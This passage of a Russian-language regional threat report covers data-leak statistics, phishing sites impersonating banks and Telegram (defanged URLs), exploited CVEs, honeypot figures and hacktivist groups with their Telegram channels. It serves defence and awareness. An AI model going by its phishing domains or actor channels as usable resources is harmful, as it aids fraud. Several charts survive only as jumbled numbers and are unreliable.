6 LATAM 2022 Q1 2023 Q1 2024 Q1

Отношение количества уникальных юзеров KSN с детектами

шифровальщиков к количеству уникальных юзеров KSN
с детектами любого ВПО из категории Malware

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Утечки пользовательских данных Содержание 73

Утечки пользовательских данных

В данном разделе мы проанализировали факты публикаций в открытый доступ значимых12
пользовательских баз данных, относящихся к российским компаниям в 2022/2024 годах. Количество
утечек в 2024 году все также остается на достаточно высоком уровне, не смотря на видимое
уменьшение активности некоторых группировок, преимущественно публикующих материалы
в Telegram каналах. В Q1`24 61% утечек пользовательских данных публикуется в свободном доступе
в течение месяца после выгрузки из базы атакованной компании, в Q1`23 данное значение было
49%. Данное обстоятельство связано с увеличением количества публикуемых баз, относящихся
к предприятиям малого и среднего бизнеса, которые в свою очередь представляют меньший
интерес, чем базы крупных компаний и используются преимущественно для поднятия репутации
злоумышленника или проекта.

За январь-март 2024 года установлено 41 факт публикаций13 пользовательских баз данных на Теневых
форумах и Telegram каналах. Несмотря на заметное снижение по сравнению с аналогичным периодом
2023 года, мы наблюдаем постепенный рост в количестве публикаций последние 3 квартала.
Одним из основных факторов является возобновление влияния Теневой площадки Breached, после
приостановки работы в марте 2023 года.

График 8 Распределение публикаций утечек данных

Количество 67
публикаций

55

46
42 41
38

27 28

21

Q1’22 Q2’22 Q3’22 Q4’22 Q1’23 Q2’23 Q3’23 Q4’23 Q1’24

12 Значимая утечка данных — утечка данных, в результате которой было скомпрометировано более 5 тыс. строк
пользовательских данных или которая получила резонанс в СМИ.

13 В статистику не попали базы данных выставленные на продажу.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Утечки пользовательских данных Содержание 74

График 9 Распределение публикаций утечек данных

(по каналам распространения)
Теневые 30
площадки
Телеграм

25

20

15

10

0
Янв Фев Март Апр Май Июнь Июль Авг Сент Окт Нояб Дек Янв2 Фев2 Март2 Апр2 Май2 Июнь2 Июль2 Авг2 Сент2 Окт2 Нояб2 Дек2 Янв3 Фев3 Март3

41 пользовательская база, опубликованная в Q1`2024, содержали

в себе более 102 миллионов пользовательских данных, что на 42%
меньше, чем за аналогичный период 2023 года.

Более 19 миллионов пользовательских паролей было

скомпрометировано в Q1`2024, что в 6 раз больше, чем
за аналогичный период 2023 года.

В Q1`2024 года публичных утечек, связанных с представителями крупного бизнеса, сильно уменьшилось
- только 5%, когда за аналогичный период 2023 это было 22%. Крупный бизнес, зачастую, имея больше
количество клиентов, хранит и обрабатывает огромные массивы пользовательских данных, поэтому
именно количество атак на представителей крупного бизнеса сильно влияет на совокупные объемы
скомпрометированных данных от периода к периоду.

Сфера Ритейла традиционно больше всего страдает от утечек данных, 23 инцидента связанных
с утечками данных было выявлено в Q1`2024. 2024 не отличается разнообразием по атакованным
сферам, в отличие от предыдущих лет. Помимо Ритейла, под удар попали организации финансовой
отрасли и компании, относящиеся к сфере Здоровье.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Утечки пользовательских данных Содержание 75

График 10 Распределение публикаций утечек данных (по отраслям)

2024 23
Ритейл
2023 13

8
Финансы
7

6
Здоровье
1
2
Рестораны и доставка еды
3

1
Интернет-сервис
4

Карьера и образование
5

IT
5

Госорганы
3

Некомерческая организация
3

СМИ
2

Телекоммуникации
2

Доставка
2

Социальная сеть
1

Транспорт
1

Недвижимость
1

1
Другое
2

Несмотря на преобладающее количество инцидентов в компаниях из области Ритейла, именно атаки

на финансовые организации (банки, микрофинансовые организации, страховые компании) позволили
злоумышленникам опубликовать более 83 млн пользовательских данных, что составляет 81 процент
всех данных опубликованных за Q1`2024.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 76

Социальная инженерия
В данном разделе мы хотим поделиться с нашими читателями интересными примерами и статистикой
по атакам, связанным с использованием социальной инженерии.

Социальная инженерия является популярным методом атаки среди злоумышленников, от мошенников

и хактивистов до APT-группировок. Все они пытаются воспользоваться невнимательностью человека
по ту сторону экрана и обмануть его. Это позволяет злоумышленникам скомпрометировать жертву,
например, получив учётные данные от аккаунта в социальных сетях, банковского приложения или
аккаунта в домене.

Далее мы рассмотрим несколько примеров подобных атак, характерных для каждой страны
исследуемого региона.

Предварительно стоит отметить, что хоть представленные примеры фишинга, в основном, и нацелены
на граждан определенной страны, это не значит, что фишинговая кампания может ограничиваться
только ей, так как граждане и другие потенциальные цели кампании, могут находиться за пределами
рассматриваемой страны.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 77

Армения

Фишинговый URL hxxps://quickfund[.]click/

Здесь мы видим пример того, как злоумышленники могут маскироваться под микрофинансовые
организации с целью получения персональных данных жертвы и/или последующей кражи денежных
средств. Текст на русском: «Быстрое предоставление кредита. Сумма кредита. Имя Фамилия.
Возраст. Телефон.».

Рисунок 8 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 78

Фишинговый URL hxxps://dolbaebshesp[.]in/

В данном примере злоумышленники предлагают пользователю авторизоваться в Telegram для того,

чтобы проголосовать в опросе. Текст на русском: «Войдите в Telegram, чтобы проголосовать.
Введите свой зарегистрированный номер Telegram.».

Рисунок 9 Страница расположенная на фишинговом ресурсе

Судя по информации полученной из Kaspersky Threat Intelligence Portal можно сказать, что данный
адрес используется в фишинговых кампаниях с конца февраля 2024 года в таких странах как: Армения,
Россия, Узбекистан и Грузия. Также видно статистику по датам, в которые были зафиксированы
всплески активности, а также информацию о том, что данный адрес имеется в нашем Phishing URL
Data Feed.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 79

Рисунок 10 Информация по фишинговому адресу в Kaspersky Threat

Intelligence Portal

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 80

Азербайджан
В Азербайджане, как и во многих других странах исследуемого региона, фишинг чаще всего направлен
на получение доступа к банковским данным или другой конфиденциальной информации, связанной
с финансовыми учреждениями.

Фишинговый URL hxxps://[Link][.]site/

Рисунок 11 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 81

Фишинговый URL hxxps://[Link][.]site/president-

transfer/191660934?

Рисунок 12 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 82

Фишинговый URL hxxp://uzbfs[.]com/

Также хочется отметить, что использование Telegram в контексте фишинга и социальной инженерии
становится все более и более популярным, ввиду того, что в исследуемом регионе данный мессенджер
имеет большую распространенность.

Только за 2023 год, компонент «Защита чатов» мобильных решений «Лаборатории Касперского»
предотвратил более 62 тысяч переходов по фишинговым ссылкам из Telegram14.

Как мы можем понять из скриншота, представленного ниже, в котором написано: «Получить бонус
200 манат от Kapital Bank! Для подтверждения личности войдите в Telegram или зарегистрируйтесь.».
Злоумышленники, как и в примере из блока с Арменией, предлагают пользователю выполнить вход
с помощью Telegram для получения учетных данных Telegram-аккаунта жертвы.

14 Спам и фишинг в 2023 году Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 83

Рисунок 13 Страница, расположенная на фишинговом ресурсе

На нашем TIP-портале можно найти множество информации, связанной с интересующим доменом,

в частности адреса, на которые происходит редирект с фишингово адреса. На них также следует
обращать внимание и проверять в своих логах, если вы вдруг стали целью подобной атаки.

Рисунок 14 Список доменов, на которые происходит редирект с фишингового

адреса

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 84

Беларусь

Фишинговый URL hxxps://belarusbank.cabinet8[.]xyz/228702666

Рисунок 15 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 85

Информация по фишинговому адресу, полученная с TIP-портала представлена ниже:

Рисунок 16 Информация по фишинговому адресу в Kaspersky Threat

Intelligence Portal

Рисунок 17 Список масок, относящихся к домену из Phishing URL Data Feed

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 86

Фишинговый URL hxxps://pay-delivery[.]by/card/623768708?r=202

Рисунок 18 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 87

Казахстан

Фишинговый URL hxxps://capitalstart[.]click/

Рисунок 19 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 88

Фишинговый URL hxxps://prospageone[.]com/shop/halykbankinvestuz

/?subid_1=14128564511710400109&subid_2=4608&
subid_3=575_10618&subid_4=4609

Рисунок 20 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 89

Фишинговый URL hxxps://rakemm[.]com/

hxxps://kaspi-profit-now[.]com/

Рисунок 21 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 90

Рисунок 22 Статистика фишинговых атак с использованием адреса

hxxps://rakemm[.]com/

Выше мы представили статистику фишинговых атак с использованием адреса hxxps://rakemm[.]com/

с нашего Kaspersky Threat Intelligence Portal. На ней можно видеть в какой стране происходят данные
атаки, а также тенденцию роста атак каждый день.

Рисунок 23 Страница, расположенная на фишинговом ресурсе

Для атак с использованием социальной инженерии в Казахстане примечательным является то, что
большое количество фишинговых сайтов пытаются маскироваться под один из самых популярных
в стране банков «Kaspi». Поэтому пользователям из данного региона следует быть особенно
бдительными при посещение сайтов связанных с данным банком.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 91

Кыргызстан

Фишинговый URL hxxps://coinmarket[.]kg/

Рисунок 24 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 92

Россия

Фишинговый URL hxxps://superpuoer[.]ru/l/[Link]

Фишинговый сайт, маскирующийся под популярную социальную сеть «VK».

Рисунок 25 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 93

Информация по фишинговому адресу, полученная с TIP-портала представлена ниже:

1 Таймлайн, в рамках которого были замечены фишинговые атаки с участием данного URL

Рисунок 26 Таймлайн в TIP

2 Домены, на которые был замечен редирект, также URL-маски, относящиеся к домену

Рисунок 27 Информация по URL в TIP

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 94

Фишинговый URL hxxps://lithzh[.]ru/

Рисунок 28 Страница, расположенная на фишинговом ресурсе

Фишинговый URL hxxps://work-tin-login[.]ru/

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 95

Рисунок 29 Страница, расположенная на фишинговом ресурсе

Рисунок 30 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 96

Туркменистан

Фишинговый URL hxxps://[Link][.]app/

login

Рисунок 31 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 97

Узбекистан

Фишинговый URL hxxps://yordammexr-fondonlines[.]top/[Link]

Рисунок 32 Страница, расположенная на фишинговом ресурсе

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 98

Из всех представленных выше примеров видно, что злоумышленники, в основном, маскируют свои
фишинговые сайты под финансовые организации, будь то банки или различные микрофинансовые
организации. Встречаются примеры маскировки под популярные социальные сети, магазины или
сервисы. Также можно отметить, что популярным способом компрометации является создание
поддельных форм аутентификации в мессенджере Telegram под предлогом «подтверждения личности».

Чтобы быть готовым ко встрече с подобным видом атак, следует заранее озаботиться о поставщиках
разведданных, которые позволят вовремя обнаружить фишинговые кампании. Именно такие
данные можно получать с помощью нашего Phishing URL Data Feed15, который пополняется самыми
актуальными данными о фишинговых доменах и адресах со всем необходимым контекстом каждые
20 минут.

Для более подробного ознакомления с фишинговыми и спам кампаниями, произошедшими

за последний год, рекомендуем изучить отчет, который был подготовлен нашими коллегами из команды
Content Filtering Research (CFR) — Спам и фишинг в 2023 году16.

15 Phishing URL Data Feed Подробнее

16 Спам и фишинг в 2023 году Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 99

Статистика по атакам с использованием социальной инженерии

Также предлагаем нашим читателям ознакомиться со статистикой атак, в которых использовалась
социальная инженерия.

На основе телеметрии Лаборатории Касперского за 3 года, мы проанализировали и суммировали все

подобные атаки. Хотим отметить, что пиковые значения по количеству атак были достигнуты в 2022
и 2023 годах, но, в 1 квартале 2024 наблюдается большее общее количество фишинговых кампаний,
в среднем, по сравнению с аналогичными временными отрезками в 2022 и 2023 годах.

График 11 Количество атак с использованием социальной инженерии

Q1 22‑24 гг
2024
2023
2022

0
03.01.20232

07.01.2023

15.01.2023
17.01.20232

29.01.2023

16.02.2023

22.03.20232
24.03.2023
11.01.2023

27.01.2023

10.03.2023
01.01.2023

05.01.20234

04.02.2023
06.02.2023
08.02.2023

12.02.2023

18.02.2023
14.02.2023

20.02.2023

08.03.2023

12.03.2023

16.03.2023
18.03.2023
09.01.2023

19.01.2023

23.01.2023
21.01.2023

25.01.2023

02.02.2023

22.02.2023
24.02.2023
26.02.20232

04.03.2023
06.03.2023

14.03.2023
28.02.2023
02.03.2023

20.03.2023

26.03.2023
28.03.2023
30.03.2023
13.01.2023

31.01.2023

10.02.2023

Сказанное выше также подтверждает статистика с процентным соотношением пользователей,

столкнувшихся с рассматриваемыми атаками по отношению к общему числу пользователей в России
и СНГ за первые кварталы 2022 – 2024 гг.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Социальная инженерия Содержание 100

График 12 Количество атак с использованием социальной инженерии

Q1 22‑24 гг
Таджикистан 8
Беларусь
Узбекистан
7
Туркменистан
Кыргызтан
6 6 6 6
Казахстан
Россия
5 5 5 5 5 5
Азербайджан
Армения
4 4 4 4 4 4

3 3 3

2 2 2 2

1 1

2022 2023 2024

Подводя итоги по атакам с использованием социальной инженерии, стоит отметить, что общее
количество атак и пострадавших в большинстве стран региона растет от года к году. Все текущие
тенденции в мире кибербезопасности, будь то количество мошеннических операций и продвинутых
целевых атак, говорят нам о том, что использование социальной инженерии как одного из основных
методов компрометации вряд ли уменьшится в ближайшее время. И всегда нужно быть готовым к тому,
что рано или поздно данный вектор атаки будет использован против вас.

В связи с этим, важно заранее позаботиться о защите, такой как, например, решение по защите
электронной почты «Kaspersky Security для почтовых серверов»17, которое позволит защитить
пользователей от вредоносного фишинга и других атак, связанных с использованием электронной
почты.

Также, не стоит забывать о том, что технической защиты не всегда может быть достаточно, чтобы
предотвратить атаку. Поэтому стоит позаботиться о повышении осведомленности в области
кибербезопасности ваших работников. Для этого можно воспользоваться платформой Kaspersky
Security Awareness18.

17 Kaspersky Security для почтовых серверов Подробнее

18 Kaspersky Security Awareness Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 101

Ландшафт уязвимостей
В данном разделе мы собрали и проанализировали статистику по уязвимостям, которые являются
наиболее популярными среди злоумышленников, атакующих организации из России и СНГ в 2023/2024.

В этом разделе будет представлена статистика, основанная на сетевой (Сетевой ландшафт

уязвимостей) и хостовой (Ландшафт уязвимостей на конечных устройствах) телеметрии, собираемой
решениями Лаборатории Касперского.

Сетевой ландшафт уязвимостей

На основе обширной сетевой телеметрии Лаборатории Касперского мы проанализировали
и составили Топ-10 уязвимостей, которые чаще всего эксплуатировали злоумышленники в своих атаках
на организации из России и СНГ в 2023/2024. Ниже приведена диаграмма, на которой изображено
процентное соотношение самых популярных эксплуатируемых уязвимостей, обнаруженных
решениями Лаборатории Касперского в 2023/2024.

График 13 Топ-10 CVE на основе сетевой теметрии 23/24

CVE-2021-44228

CVE-2019-0708
2%
3%
CVE-2020-7247

CVE-2018-1270

CVE-2021-26084
3%
CVE-2017-12611 2% 2%
3%
CVE-2018-11776

CVE-2019-10149 3%
CVE-2017-9791

CVE-2019-19781
5%
CVE-2017-5638

48%
12%

17%

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 102

Стоит отдельно упомянуть знаменитую уязвимость MS17-010, которая все еще остается актуальной
для анализируемого региона. Мы намеренно вывели ее отдельно из Топ-10, так как количество попыток
эксплуатации данной уязвимости слишком велико и негативно повлияет на удобство восприятия
текущей ситуации в Сетевом ландшафте уязвимостей.

Ниже приведена таблица, в которой содержится более подробная информация об эксплуатируемых

уязвимостях:

Уязвимость Тип уязвимости Оценка Продукт

CVSS

KLA12390/ Удаленное выполнение кода 10.0 Apache Log4j 2.0-beta9 before 2.15.0
CVE-2021-
Полный список продуктов можно
44228 посмотреть по ссылке — KLA12390
(Log4Shell)
Подробнее

KLA11706/ Удаленное выполнение кода 9.8 Microsoft Windows

CVE-2019- Раскрытие чувствительной информации Microsoft Windows Server
0708 (Blue-
Повышение привилегий Полный список продуктов можно
Keep) посмотреть по ссылке — KLA11706
Подмена пользовательского интерфейса

Подробнее

CVE-2020- Удаленное выполнение кода 9.8 OpenSMTPD 6.6.1 и более ранние

7247 версии
Повышение привилегий

CVE-2018- Удаленное выполнение кода 9.8 Spring Framework от 5.0 до 5.0.5

1270 и от 4.3 до 4.3.15

CVE-2021- Удаленное выполнение кода 9.8 Confluence Server

26084 Confluence Data Center
Полный список продуктов
можно посмотреть по ссылке —
CVE‑2021‑26084

Подробнее

CVE-2017- Удаленное выполнение кода 9.8 Apache Struts 2.0.0 – 2.3.33 и 2.5 –
12611 [Link]

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 103

Уязвимость Тип уязвимости Оценка Продукт

CVSS

CVE-2018- Удаленное выполнение кода 8.1 Apache Struts 2.3 – 2.3.34 и 2.5 – 2.5.16
11776

CVE-2019- Удаленное выполнение кода 9.8 Exim 4.87 – 4.91

10149

CVE-2017- Удаленное выполнение кода 9.8 Apache Struts 2.1.x и 2.3.x

9791

CVE-2019- Удаленное выполнение кода 9.8 Citrix ADC от 13.0 до [Link]

19781 Citrix Gateway от 13.0 до [Link]
NetScaler ADC от 12.1 до [Link]
NetScaler Gateway от 12.1 до [Link]
Полный список продуктов
можно посмотреть по ссылке —
CVE‑2019‑19781

Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 104

Выводы по сетевому ландшафту уязвимостей

Несмотря на то, что в мире кибербезопасности каждый день появляется все больше новых, опасных
и легко эксплуатируемых уязвимостей, злоумышленники предпочитают не менять свои сценарии атак
и использовать уже давно известные и популярные уязвимости в продуктах, используемых большим
количеством организаций. Больше половины эксплуатируемых CVE датируются концом прошлого
десятилетия, что говорит о том, что для минимизации рисков эксплуатации необходим грамотно
выстроенный процесс Patch Management, а также использование современных решений, например,
Kaspersky Endpoint Security со встроенными средствами управления уязвимостями и установкой
исправлений, решения класса IDS/IPS, а также Vulnerability Data Feed, которые позволят снизить риски
и повысить уровень защищенности.

Ландшафт уязвимостей на конечных устройствах

В данном разделе мы собрали и проанализировали статистику по эксплуатируемым уязвимостям,
обнаруженным нашими решениями класса EPP и EDR в организациях расположенных в России и СНГ
в 2023/2024.

Уязвимости обозначаются как KLA00000, где — KLA — это KL Article, сущность, которая связывает
некоторый набор уязвимостей между собой по различным признакам, например по вендору, версии
затронутого продукта или эксплуатируемому компоненту, а 00000 — это пятизначный идентификатор
сущности KLA.

Данный тип идентификаторов используется на портале Kaspersky Threats19 и в потоках данных об

угрозах20 (фидах).

19 Kaspersky Threats Подробнее

20 Kaspersky Threat Data Feeds Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 105

Ниже представлена диаграмма на которой изображено процентное соотношение 10 самых популярных

эксплуатируемых уязвимостей (KLA), обнаруженных решениями Лаборатории Касперского на конечных
устройствах в 2023/2024:

График 14 Топ-10 уязвимостей на основе хостовой телеметрии 2023/2024

KLA60809
KLA12514
KLA52366 4%
KLA48769
5%
KLA49112
5%
KLA49112
KLA48512
5% 28%
KLA62539
KLA60560
KLA51005

5%

5%

6%

26%
11%

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 106

Ниже представлена таблица, в которой содержится более подробная информация по 10 самым

распространенным эксплуатируемым уязвимостям в регионе Россия и СНГ:

Место Уязвимость Тип уязвимости Оценка Продукт CVE

CVSS

1 KLA60809 Выполнение вредоносного 7.8 Версии 7-Zip ранее CVE-2023-

кода 23.00 31102
CVE-2023-
40481

2 KLA12514 Повышение привилегий 7.8 7-Zip 21.07 и более CVE-2022-

ранние версии 29072
Выполнение вредоносного
кода

3 KLA52366 Выполнение вредоносного 7.8 WinRAR 6.x ранее CVE-2023-

кода версии 6.23 38831

4 KLA48769 Выполнение вредоносного 8.8 Google Chrome CVE-2023-1822

кода ранее версии
112.0.5615.50 CVE-2023-1812
Отказ в обслуживании
CVE-2023-1813
Обход системы
безопасности Полный список
CVE можно
Повышение привилегий посмотреть
по ссылке —
Подмена пользовательского KLA48769
интерфейса
Подробнее

5 KLA49112 Выполнение вредоносного 8.8 Google Chrome CVE-2023-2461

кода ранее версии
113.0.5672.64 CVE-2023-2462
Отказ в обслуживании
CVE-2023-
Обход системы 2460
безопасности
Полный список
Подмена пользовательского CVE можно
интерфейса посмотреть
по ссылке —
KLA49112

Подробнее

6 KLA61361 Выполнение вредоносного 8.8 Google Chrome CVE-2023-5218

кода ранее версии
118.0.5993.71
Отказ в обслуживании

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 107

Место Уязвимость Тип уязвимости Оценка Продукт CVE

CVSS

7 KLA48512 Выполнение вредоносного 8.8 Google Chrome CVE-2023-1220

кода ранее версии
111.0.5563.65 CVE-2023-1219
Отказ в обслуживании
CVE-2023-2314
Обход системы
безопасности Полный список
CVE можно
Повышение привилегий посмотреть
по ссылке —
Подмена пользовательского KLA48512
интерфейса

Подробнее

8 KLA62539 Отказ в обслуживании 5.0 Google Chrome CVE-2023-7024

ранее версии
120.0.6099.129

9 KLA60560 Выполнение вредоносного 4.3 Google Chrome CVE-2023-

кода ранее версии 4902
117.0.5938.63
Отказ в обслуживании CVE-2023-
4906
Обход системы
безопасности CVE-2023-
4900
Подмена пользовательского
интерфейса Полный список
CVE можно
посмотреть
по ссылке —
KLA60560

Подробнее

10 KLA51005 Выполнение вредоносного 8.8 Google Chrome CVE-2023-3728

кода ранее версии
115.0.5790.99 CVE-2023-3732
Отказ в обслуживании
CVE-2023-
Обход системы 3730
безопасности
Полный список
Подмена пользовательского CVE можно
интерфейса посмотреть
по ссылке —
KLA51005

Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 108

Выводы по ландшафту уязвимостей на конечных устройствах

Из полученной статистики по эксплуатируемым уязвимостям на конечных устройствах можно сделать
следующие выводы:

Большинство уязвимостей нацелено на утилиты, связанные с архивацией (7-ZIP и WinRAR),

1 и браузеры (Google Chrome).

2 9 из 10 уязвимостей нацелены на выполнение вредоносного кода.

3 Почти все уязвимости вышли в последний год.

Чтобы быть защищенным от возможной эксплуатации описанных выше уязвимостей необходимо, как
уже говорилось выше, развивать процесс Patch Management, который позволит обнаружить уязвимое
ПО в инфраструктуре, после чего своевременно устанавливать патчи безопасности. Следующие
решения позволят снизить риски и повысить уровень защищенности:

Kaspersky Endpoint Security со встроенными средствами управления уязвимостями

и установкой исправлений, который поможет реализовать процесс Patch Management, а также
автоматизировать его.

Vulnerability Data Feed, который содержит в себе всю необходимую информацию, которая поможет
автоматизировать процесс Patch Management.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Ландшафт уязвимостей Содержание 109

Выводы по ландшафту уязвимостей

Исходя из описанных выше уязвимостей и статистики их эксплуатации, подведем итоги
по полученному ландшафту уязвимостей в исследуемом регионе.

Уязвимости, эксплуатация которых была зафиксирована сетевыми средствами защиты и решениями

класса EPP и EDR, значительно отличаются по ряду параметров.

Например, если во время сканированиями сетевого периметра злоумышленники эксплуатируют

уязвимости, датируемые второй половиной прошлого десятилетия, рассчитывая на то, что многие
компании до сих пор не пропатчили их, то уязвимости, эксплуатируемые непосредственно на конечных
устройствах, являются более актуальными (датируются в основном 2023 годом). Это говорит о том, что
во многих организациях сильно отличаются процессы Vulnerability Assessment и Patch Management для
сетевых и конечных устройств соответственно.

Стоит больше уделять внимания устройствам, расположенным на периметре организации

и доступным извне, внедрять или улучшать процессы Vulnerability Assessment и Patch Management,
снижать риски за счет митигации тех или иных уязвимостей, например, если нет возможности
обновить ПО до актуальной версии с исправлениями, а также не забывать про Hardening
инфраструктуры21.

Помочь с защитой от сетевых и хостовых угроз может Kaspersky Endpoint Security, который защищает
от обеих категорий уязвимостей благодаря многоуровневому подходу к обеспечению безопасности.
Это означает, что продукт отслеживает артефакты атак на каждом этапе использования. В KES
есть множество различных технологий, которые участвуют в процессе защиты от использования
уязвимостей и на этапах после их использования:

Защита от сетевых угроз — сетевая защита EPP. Может блокировать вредоносный сетевой трафик
для предотвращения использования уязвимостей, а также для обнаружения действий после их
использования.

Защита на основе поведения — обнаружение и защита на основе поведенческих артефактов.

Большинство эксплойтов проявляют себя через поведение, поэтому защита на основе поведения
может получать и использовать эту информацию для защиты от угроз.

Также, в защите от эксплойтов участвуют механизмы статического обнаружения. Они включают

в себя передовые подходы, такие как ML, Astraea, KSN. Статические механизмы очень полезны для
защиты от известных или даже неизвестных артефактов/полезной нагрузки/атрибутов эксплуатации.

21 Hardening guides различных устройств Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Статистика активности зараженных машин из РФ и СНГ на основе Honeypots Содержание 110

Статистика активности зараженных машин из РФ и СНГ на основе

Honeypots
Если посчитать, сколько было нами обнаружено попыток атак с скомпрометированных устройств,
находящихся в исследуемом регионе, то получится несколько миллионов только за первый квартал
2024 года. Статистика по странам представлена ниже:
1% 0%
График 15 Распределение
количества атак со
14%
Russia скомпрометированных 1% 0% 0%
Belarus устройств по странам-
Kazakhstan источникам
Uzbekistan
Azerbaijan
14%
Armenia
Kyrgyzstan 48%
Tajikistan
Turkmenistan

22%

Распределение по количеству
скомпрометированных машин в регионе
следующее: 1% 1% 0%
2%

График 16 Распределение количества

скомпрометированных
Russia машин по странам 1% 1% 0%

18%
Azerbaijan
Kazakhstan
Uzbekistan
Armenia
Belarus
Kyrgyzstan
Tajikistan
Turkmenistan

76%

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Атаки в публичном поле на основе OSINT Содержание 111

Атаки в публичном поле на основе OSINT

Таблица, с описанными ниже источниками, не является исчерпывающей, а лишь демонстрирует
текущие тенденции кибератак в исследуемом регионе.

Здесь мы наблюдаем значительное количество хактивистских группировок, которые совершают

кибератаки, в основном, на различные компании из России и Беларуси, преимущественно
из государственного сектора. Целью этих атак обычно является кража и/или уничтожение данных.
Также не следует забывать и о продвинутых постоянных угрозах (APT), которые продолжают
использовать сложные и изощренные тактики и техники для проникновения в компанию с целью
шпионажа и/или кражи данных.

Мы хотели бы подчеркнуть, что представленная в таблице информация включает реальные Telegram

каналы, связанные с предполагаемыми хактивистскими группировками. Используйте данные источники
с осторожностью.

Дата Страна Индустрия Актор Цель атаки Источник

2022 – Армения, Компании из Tomiris Кража данных Подробнее

2023 Азербайджан, государственного
Беларусь, и энергетического секторов
Кыргызстан,
Россия,
Таджикистан,
Туркменистан,
Узбекистан

2023 Россия Некоммерческие BO Team Уничтожение

организации Подробнее
данных

2023 Армения, Компании из Cloud Atlas Шпионаж, Подробнее

Беларусь, государственного сектора кража данных
Россия,
Казахстан,
Кыргызстан,
Таджикистан,
Туркменистан

2023 Беларусь, Компании из CloudWizard Шпионаж, Подробнее

Россия государственного сектора кража данных

2023 Россия Различные компании Blackjack Кража данных, [Link]

на территории России Уничтожение blackjack_l
данных

2023 Россия Различные компании Muppets Кража данных, [Link]

на территории России Уничтожение wearemuppets
данных

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Атаки в публичном поле на основе OSINT Содержание 112

Дата Страна Индустрия Актор Цель атаки Источник

2023 – Россия Различные компании UHG Кража данных, [Link]

2024 на территории России Уничтожение Ukrainian
HackerGroup
данных

2023 – Россия Различные компании C.A.S Кража данных, [Link]

2024 на территории России Уничтожение cyber_anarchy_
squad
данных

2022 – Россия Различные компании DumpForums Кража данных, [Link]

2024 на территории России Уничтожение dfhmara
данных

2022 – Россия Различные компании RM RF Кража данных [Link]

2024 на территории России RMRFgroup

2022 – Россия Различные компании Key Group Кража данных, Подробнее

2024 на территории России Уничтожение
данных

2023 – Россия Компании из Twelve Кража данных, Подробнее

2024 государственного сектора Уничтожение
данных

2023 – Россия Компании из государстве XDSpy Кража данных

2024 нного,производственного Подробнее
и военно-промышленного
секторов

2022 – Россия Различные компании Cyber Кража данных [Link]

2024 на территории России Legions F7rGpMg3A
5A2MTgy

2023 – Россия Различные компании Кібер Кража данных [Link]

2024 на территории России Спротив cyber
ResistanceUA

